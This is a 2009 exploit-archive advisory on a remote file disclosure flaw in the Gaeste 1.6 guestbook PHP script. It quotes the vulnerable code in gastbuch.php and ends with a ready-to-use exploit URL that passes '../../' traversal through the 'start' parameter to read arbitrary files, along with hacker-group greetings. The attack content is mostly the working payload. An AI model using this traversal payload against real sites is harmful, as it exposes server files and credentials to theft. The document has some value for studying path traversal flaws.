[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability
# Published : 2009-02-09
# Author : bd0rk
# Previous Title : WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability
# Next Title : Hedgehog-CMS 1.21 (LFI) Remote Command Execution Exploit


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
               +                                                                +
               + Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
               +                                                                +
               +                     bd0rk || SOH-Crew                          +
               +                                                                +
               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)

=> Vulnerable Code in gastbuch.php line 2-3

        -------------------------------
                              
           if (isset($_GET['start'])) {
           $start=$_GET['start'];

        -------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

# www.Syue.com [2009-02-09]